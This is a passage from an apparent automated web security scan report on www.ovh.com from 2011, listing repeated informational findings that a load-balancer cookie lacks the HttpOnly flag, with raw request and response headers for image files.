Path:	/fr/themes/default/images/blue/logos/sd_bsd.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/blue/logos/sd_bsd.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:24:56 GMT
ETag: "34165-5a6-441ae77bf8e00"
Accept-Ranges: bytes
Content-Length: 1446
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1792
Content-Type: image/gif

GIF89a .#.......7.."..+.
L........&..4..^..?..4. ...?..I..)... ?..#..>..#!.=...*.]..V..z..V..(,.H".].
\..G#!R!.+,*$/%a .g..f..2,&?)(r..5-#4,1T$${..V(.z..r.%?/.G- /5.z.(c(#y$.V.*q'"}% W0#. ..$.B8)x)!;
...[SNIP]...

3.86. http://www.ovh.com/fr/themes/default/images/blue/logos/sd_linux.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/blue/logos/sd_linux.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/blue/logos/sd_linux.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:24:56 GMT
ETag: "34169-56c-441ae77bf8e00"
Accept-Ranges: bytes
Content-Length: 1388
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1791
Content-Type: image/gif

GIF89a .#...............................
........
........ ....!
......... ...............2........!.%. .?..1".,!,*$.(&*0%5#..7+./,!5-.L-.61.447>2.45=J5.6:,<:.[4.??(V;.N<.A?CQI>LJNML=[K'PLEIMZhT.cRDY
...[SNIP]...

3.87. http://www.ovh.com/fr/themes/default/images/blue/logos/sd_sol.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/blue/logos/sd_sol.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/blue/logos/sd_sol.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 24 Sep 2009 16:25:35 GMT
ETag: "3416d-42e-4745547f31dc0"
Accept-Ranges: bytes
Content-Length: 1070
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1792
Content-Type: image/gif

GIF89a .#.....h..i..i..j..j..k..k..l..l..m..m..n..n..n..o..o..o..o..o..p..p..p..q..t
.v..w..w..x..y..y..|..|..|..|..}..}...........%..%..&..,..,..,../..3..:..D..F..I..P..N..Q..R..U..W..X..h..g..j..n.
...[SNIP]...

3.88. http://www.ovh.com/fr/themes/default/images/blue/logos/sd_win.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/blue/logos/sd_win.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/blue/logos/sd_win.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 20 Dec 2007 02:24:56 GMT
ETag: "3416f-65d-441ae77bf8e00"
Accept-Ranges: bytes
Content-Length: 1629
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1791
Content-Type: image/gif

GIF89a .#....00v+3.43.'6.l4..1.DC.3F..6..=..9
.@..H".H.FL.>N.GX.VY..G..I.<_.Ro
\k.Sn..R".T.Oa..Q.Wy..^5fg..Z.^j..p1.Y.S.._.!Us.`..gq..`j.1.{.y9tJY...nVfw..c.pz.o.!rz..l..qG_.......7..2`..m.....Us
...[SNIP]...

3.89. http://www.ovh.com/fr/themes/default/images/blue/mainMenuList.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/blue/mainMenuList.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/blue/mainMenuList.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Mon, 22 May 2006 17:25:28 GMT
ETag: "33f18-7b-41463c9df1200"
Accept-Ranges: bytes
Content-Length: 123
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:56 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a........D.E..F..H..R. T.!U.0_.?j.Hq.Ls.{..............!..Created with The GIMP.!...
...,...........P.g.+c...@...S..;

3.90. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/Hbar.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/Hbar.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/Hbar.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "3432e-ad-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 173
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:59 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR..............e.S....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<....*IDAT8.c.....Q0
F......../^..hw..Q0.......>f .-.{.....IEND.B`.

3.91. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/VPS.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/VPS.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/VPS.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34330-16ce-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 5838
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1792
Content-Type: image/png

.PNG
.
...IHDR...F...2........S....sRGB.........bKGD.............vIDAThC.[Y.d.Y....^..]..l=....c{.8NB.I0.. .("/..#...B.....'^."..X.DI.$.X....J.8$v<..f........k_.R...s..{.'r'.L...n...9........_=...k7
...[SNIP]...

3.92. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/experts.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/experts.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/experts.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34333-fc8-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 4040
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1792
Content-Type: image/png

.PNG
.
...IHDR...F...2........S....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<....EIDATh...yt\.}.?..y.kF.h..#.......o..[(....a.1 $...nI....j.a.u..?==!l ..k...1r.`.U.%.ZmI..
...[SNIP]...

3.93. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/hosting.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/hosting.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/hosting.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34334-3769-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 14185
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1792
Content-Type: image/png

.PNG
.
...IHDR...F...2........S....gAMA......a.....bKGD............. pHYs............... .IDATh...6................................................................................................
...[SNIP]...

3.94. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/order_index.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/order_index.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/order_index.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34335-5a1-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 1441
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1791
Content-Type: image/gif

GIF89a(.......t..v..y..z.$}.&.(.....6..6..:..A..?..@..A..I..J..M..N..Q..V..W..W..X..T..V..V..W..W..\..[..^..Z..\..]..^..]..].._..a..`..f..b..e..b..d..f..h..i..j.....l..p...........q..s..y..t..v..y...
...[SNIP]...

3.95. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/rdesktop.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/rdesktop.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/rdesktop.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34336-3769-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 14185
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1792
Content-Type: image/png

.PNG
.
...IHDR...F...2........S....gAMA......a.....bKGD............. pHYs............... .IDATh...6.....f.........................................
................"'.........>=H.............=.......
...[SNIP]...

3.96. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/right_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/right_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/right_bg.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "34337-14bd-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 5309
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:08 GMT
Age: 1790
Content-Type: image/gif

GIF89a.. ....
E.
F..F. G.
H. I..J..K..L..N..K..L..O..Q..Q..R..T..T..V..Q..W..Y..Z..T..X..V..T..\..]..]..V..^..W.._..X..Y..Y."X..a..b..[..c..\..d..].._..`..b.*^..c..c..e..f.+a..g..h..i..i..j.(f..k..k.2
...[SNIP]...

3.97. http://www.ovh.com/fr/themes/default/images/dedicated/Umode/yes_bk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/dedicated/Umode/yes_bk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/dedicated/Umode/yes_bk.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 28 Aug 2008 16:18:03 GMT
ETag: "3433b-38c-455877b3724c0"
Accept-Ranges: bytes
Content-Length: 908
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:01 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a.....8............................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

3.98. http://www.ovh.com/fr/themes/default/images/flags/cz.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/cz.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/cz.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:51 GMT
ETag: "343d3-1dc-45187a10903c0"
Accept-Ranges: bytes
Content-Length: 476
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:46 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...nIDATx.bd.?.. ..&..........8....@.......+{.._.E........B./^... & ...g../G....+C3.b!@.........s..........@4.
...[SNIP]...

3.99. http://www.ovh.com/fr/themes/default/images/flags/de.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/de.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/de.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:51 GMT
ETag: "343d4-221-45187a10903c0"
Accept-Ranges: bytes
Content-Length: 545
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b..qf.....?.f._............p...b...{qq9........./.........~.^.n5@..011.U.8y $.....?A..~......N@...."..
...[SNIP]...

3.100. http://www.ovh.com/fr/themes/default/images/flags/es.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/es.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/es.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:59 GMT
ETag: "343e0-1d5-45187a18315c0"
Accept-Ranges: bytes
Content-Length: 469
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:45 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR................n....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...gIDATx.b.....P.X.@..........._......up...2...KF6h....U.wg..........@. ..CH(..$.....f......@,...3......}....
...[SNIP]...

3.101. http://www.ovh.com/fr/themes/default/images/flags/fi.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/default/images/flags/fi.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/default/images/flags/fi.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:47:57 GMT
ETag: "343e4-1e9-45187a1649140"
Accept-Ranges: bytes
Content-Length: 489
Cache-Control: max-age=3600
